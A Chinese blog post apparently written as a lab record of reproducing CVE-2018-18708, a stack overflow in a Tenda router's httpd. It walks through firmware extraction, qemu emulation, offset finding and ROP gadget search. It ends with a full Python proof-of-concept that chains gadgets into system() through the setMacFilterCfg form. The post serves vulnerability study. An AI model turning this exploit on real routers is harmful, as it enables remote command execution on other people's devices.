Iot:cve-2018-18708实验记录

最新推荐文章于 2024-05-03 16:49:47 发布
最新推荐文章于 2024-05-03 16:49:47 发布
阅读量2.8k 收藏
点赞数
分类专栏: CTF PWN Iot 文章标签: 系统安全 安全 安全架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39948058/article/details/120554109
版权
CTF 同时被 3 个专栏收录
32 篇文章 2 订阅
订阅专栏
PWN
29 篇文章 0 订阅
订阅专栏
Iot
1 篇文章 0 订阅
订阅专栏

前言:复现了一道路由器cve的题。这里来记录一下,学习一下路由器漏洞挖掘的技巧,大佬勿喷

1、先去官方下载相应的固件版本进行审计
2、再用binwalk -t -e 对bin文件进行提取
3、根据cve-2018-18708的漏洞描述,它的中间件有漏洞。对它的bin目录下的httpd进行审计
4、遇到的一个问题就是在qemu启动这个httpd文件时候,会有检测网络的东西,所以我们要把它patch掉
现在就简绍一下如何patch arm程序为nop
首先:1、edit-》patch program-》change byte 32位下的nop:00 00 A0 E1 即可
5、再进行sudo chroot . ./qemu-arm-static -g 1234 bin/httpd启动就可以了
6、这里再用pattern create 300 个字符来测下溢出
7、经过ida进行代码审计,发现在cgi中有缓冲区溢出,也就是post传参,我可以写个python脚本进行测试
import requests

url = "http://127.0.0.1/goform/setMacFilterCfg"

cookie = {"Cookie":"password=12345"}

data = {"macFilterType": "white", "deviceList": "r"+ "A"*500}
8、cyclic -l taac 查找pc精确偏移
9、ROPgadget --binary ./lib/libc.so.0 | grep "mov r0, sp"

0x00040cb8 : mov r0, sp ; blx r3

ROPgadget --binary ./lib/libc.so.0 --only "pop"| grep r3

0x00018298 : pop {r3, pc}

最终,payload结构为[offset, gadget1, system_addr, gadget2, cmd] ,完整的POC如下:

import requests

from pwn import *

cmd="echo hello"

libc_base = 0xff58c000

system_offset = 0x5a270

gadget1_offset = 0x18298

gadget2_offset = 0x40cb8

system_addr = libc_base + system_offset

gadget1 = libc_base + gadget1_offset

gadget2 = libc_base + gadget2_offset

payload = "A"*176 + p32(gadget1) + p32(system_addr) + p32(gadget2) + cmd

url = "http://127.0.0.1/goform/setMacFilterCfg"

cookie = {"Cookie":"password=12345"}

data = {"macFilterType": "white", "deviceList": "r"+payload}

requests.post(url, cookies=cookie, data=data)

jsjsj11123
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Iot:Spring-Boot + C#实现物联网传感器数据上云、远程控制
04-30
Iot Spring-Boot + C#实现物联网传感器数据上云、远程控制 1、sensor文件夹中为传感器端运行的上位机程序,以C#实现可调用http接口桌面程序,该桌面程序使用USB2TTl连接传感器将传感器的数值全部读取并做字符串处理,然后调用服务器的接口上传; 2、springboot-iot中是一个springboot项目,提供http接口供sensor和actuator调用,有以下几个API 新增记录:GET : host:8080/upload/{value} 在数据库中新增一条记录存储url路径参数‘value’,并返回一个Response,新增成功返回状态码和新增的JSON数据,失败返回状态码和错误信息,供sensor使用,只支持HTTP-GET方法,一般来说,这里是新增数据应该使用POST方法才符合RESTFul风格,但是考虑到如果该项目真正实现的话传感器时刻都会有海量
韩顺平java项目源码-vic-tech_iot:vic-tech_iot
06-06
韩顺平java项目源码 vic-tech_iot 一个测试项目,用来学习研究基于spring-cloud的java分布式架构。 功能以物联网相关业务为基础,大致包括 设备网关 -> 与硬件设备交互,至少实现TCP(MQTT协议),消息队列(kafka),http方式 设备管理平台 -> 管理网站(前后端完全分离,后端微服务提供RESTFul的api,前端为React + Bootstarp响应式网站) 使用gradle构建,有配置gradle wapper,默认版本gradle-4.3 spring-cloud版本 -> Dalston.SR4 springboot版本 -> 1.5.6.RELEASE Author 韩珉 (Jerry) EMail 已实现或正在进行中功能 * 服务发现 * 外部配置(统一配置),可在启动时动态设置配置项,达到运维与研发分离的目的 * Oauth2安全验证(sso) * logstash日志管理 * 国际化 * 统一错误管理(对外返回有意义的统一格式的错误信息) 计划中功能 * docker容器 * DDD事件驱动模型 * Spark数据分析 * 还没
ipfs-iot:使用IPFS进行物联网通信的实验
02-03
ipfs-iot 使用IPFS PubSub进行物联网的实验。 它与使用MQTT消息代理(主题)相似,但是是分布式的。 该演示使用运行标准固件的Arduino 101和插入引脚9的LED。 您可以使用IPFS打开/关闭LED,将打开/关闭消息发送到“常规”主题。 入门 在实验性pubsub模式下运行IPFS守护程序 ipfs daemon --enable-pubsub-experiment 安装NodeJS模块 npm Install 运行物联网应用 node index.js 从另一个终端运行 ipfs pubsub pub general on 出于娱乐目的,您可以取消注释此演示中
两个栈溢出CVE漏洞实验
qq_43840665的博客
04-19 5298
实验原理 缓冲区溢出概述 定义 缓冲区是指被程序内部使用或存放用户输入的内存区域,而溢出是指计算机向缓冲区填充数据时超出了缓冲区本身的容量,从而破坏程序的堆栈,造成程序崩溃或使程序转而执行其它指令,以达到攻击的目的。 由于堆栈是由内存高地址向内存低地址方向增长,而数组的变量是从内存低地址向高地址方向增长。如果没有对数据的越界进行检查和限制,通过向程序的数组缓冲区写入超出其长度的内容,覆盖堆栈原来的返回地址,就会造成缓冲区溢出,从而破坏程序的堆栈。如果构造特殊的注入向量覆盖返回地址,使程序转而执行恶意代码
栈溢出漏洞cve linux,堆栈溢出漏洞机理
weixin_34270668的博客
05-16 238
不知道能写出来多少东西,反正最近我是没时间研究堆栈,而且对于OD的使用我也是纯白一个。大学的时候汇编课程是每周第一节,老师也没激情,都是睡过去了,现在发现有用了,⊙﹏⊙b汗,溢出方式利用我只知道有两种一种是覆盖异常处理结构的栈溢出利用方式,还有一种是覆盖栈中函数返回地址,这些原理都可以从sploit中看到,我的感觉就是sploit中的已有的***载荷用处都不大,而新的漏洞的更新可能远远慢于系统与软...
【从零复现CVE漏洞】Tenda 路由器栈溢出复现(CVE-2018-18708)
m0_55368674的博客
02-09 1923
Tenda 路由器栈溢出复现(CVE-2018-18708)
kali+php+缓冲区溢出,CVE-2018-18708:Tenda路由器缓冲区溢出漏洞分析
weixin_30641041的博客
04-13 665
CVE-2018-18708:Tenda路由器缓冲区溢出漏洞分析摘要:本文通过对一个ARM路由器缓冲区溢出漏洞的分析,实践逆向数据流跟踪的思路与方法。假设读者:了解ARM指令集基础知识、了解栈溢出原理和利用方法、了解通过IDA和GDB进行静态分析与动态跟踪的方法。阅读本文后:可以了解逆向数据流跟踪的思路与方法1. 漏洞概要CVE-2018-18708,多款Tenda产品中的httpd存在缓冲区溢出...
2022CTF培训(十)IOT 相关 CVE 漏洞分析
sky123博客
12-31 1879
这里选择的设备是一款家用路由器,型号为 D-Link DIR-850L(EOL)。由于该款路由器已停产,官网无法下载到固件,不过目前这个还能下载到相关的固件,当然附件中也会提供需要分析的固件。
2022CTF培训(十一)IOT 相关 CVE 漏洞分析
sky123博客
01-04 1245
是采用 qemu-user 对个别程序进行仿真,而对于完整的仿真需要使用 qemu-system。直接使用 qemu-system 仿真需要进行复杂的环境配置,而可以将这个过程自动化。是在 Firmadyne 的基础上开发的固件仿真框架,接下来会利用该框架尝试仿真 DIR823GA1_FW102B03。首先下载 firmware-analysis-toolkit 并运行初始化脚本。(由于要安装大量的环境依赖,如果对自己的网络没有信心的话建议拍个快照,安装失败的话可以恢复快照重新安装)之后配置。
microchip-avr-iot:AVR-IoT板安装指南
02-05
AVR-IoT快速入门快速部署工具,可将您的AVR-IoT数据存储在云上。 由Leverege提供支持。 想看看物联网有多容易吗? 查看 (链接将在此窗口中打开。Shift +单击,Command +单击或鼠标中键单击以在新窗口或选项卡中打开...
huaweicloud-iot-device-sdk-java-1.0.1.zip
06-09
华为iotSDK
aws-iot-device-sdk-go:软件包awsiotdev实现了MQTT协议的脱机排队和重新连接功能。 该程序包目前处于实验状态。 将来的更新中可能会更改接口!
03-13
aws-iot-device-sdk-go 包装awsiotdev工具AWS物联网presigned的WebSockets拨号器和AWS物联网功能。 实现的功能: 设备影子职位安全隧道贡献欢迎您提交错误报告,错误修复,功能请求和实现新功能。 随时打开一个新的...
漏洞利用—栈溢出
谈成(C/C++)
04-28 422
下面的代码可以在xp sp3系统上运行测试: int vulnfun(char* str) { char stack[10]; strcpy(stack, str); return 0; } int main() { unsigned char shellcode[] = "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53" "\xC6\x45\xF6\x56\xC6\x45\xF7\x43\xC6\x45\
c++堆栈溢出怎么解决_Office 远程溢出漏洞测试与分析
weixin_39862484的博客
11-20 296
本文作者:ghostkeeper(信安之路首次投稿作者)获得奖励:加入信安之路核心群+免费邀请加入信安之路知识星球+免费获取 90sec 论坛邀请码在 2017 年 11 月,微软发布的 11 月更新布丁中,微软将隐藏许久的 office 远程代码执行漏洞 (CVE-2017-11882)给修复了,由于该漏洞为一个标准的的栈溢出漏洞,原理与复现都较为简单,且影响从Office 2000...
网络安全实验一,栈溢出更改变量值使得判断通过,so, can u find flag
weixin_42700798的博客
10-15 1696
网络安全实验一,栈溢出,更改变量值使判断得以通过,winxp,vc6
Linux系统安全及应用(1)
煤五千的博客
04-26 1298
usermod -s /sbin/nologin 用户名usermod-L用户名passwd-S用户名passwd-用户名userdel [-r]用户名。
逻辑漏洞:水平越权、垂直越权靶场练习
qq_68163788的博客
05-02 928
水平越权和垂直越权是组织中常见的管理问题,指的是员工在组织中所拥有的权力和责任超出其职位所应具备的范围。 水平越权是指员工在同一级别的职位上超越了其同事的权力和责任范围,通常表现为某个员工在团队中承担了过多的任务或权力,导致其他同事感到不公平或不满。 垂直越权则是指员工在组织中超越了其职位等级的权力和责任范围,通常表现为员工在没有得到上级批准的情况下做出决策或行动,可能会导致组织内部的混乱和冲突。
软件应用开发安全设计指南
最新发布
weixin_41039677的博客
05-03 310
在设计系统架构时,要充分考虑各种安全威胁,如DDoS攻击、SQL注入、跨站脚本攻击(XSS)等,并采取相应的防护措施。设计时要充分考虑到系统架构的稳固性、可维护性和可扩展性,以确保系统在面对各种安全威胁时能够稳定运行。设计审计和日志记录功能,以记录系统的活动和事件,为安全审计和故障排除提供依据。对网络通讯进行严格的身份验证和访问控制,防止未经授权的访问和数据泄露。在设计软件功能时,要充分考虑功能的安全性,避免引入潜在的安全漏洞。限制对存储设备的物理访问权限,防止未经授权的访问和数据篡改。
创造未来知识管理新篇章:Ollama与AnythingLLM联手打造个人与企业的安全知识库!
跟着大数据和AI去旅行
04-30 1130
Ollama是一个开源的大型语言模型服务工具,它帮助用户快速在本地运行大模型。通过简单的安装指令,用户可以执行一条命令就在本地运行开源大型语言模型,如Llama 2。Ollama极大地简化了在Docker容器内部署和管理LLM的过程,使得用户能够快速地在本地运行大型语言模型。打造个性化聊天机器人:用Ollama和Open WebUI搭建你的私有ChatGPT!windows 下 docker compose 安装 ollama 和 open-webui ,打造私有GPT。
com.netflix.client.ClientException: Load balancer does not have available server for client: iot-plan-allocation
01-05
com.netflix.client.ClientException: Load balancer does not have available server for client: iot-plan-allocation 是一个错误异常,表示在使用Netflix Ribbon作为负载均衡器时,无法找到可用的服务器来处理...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值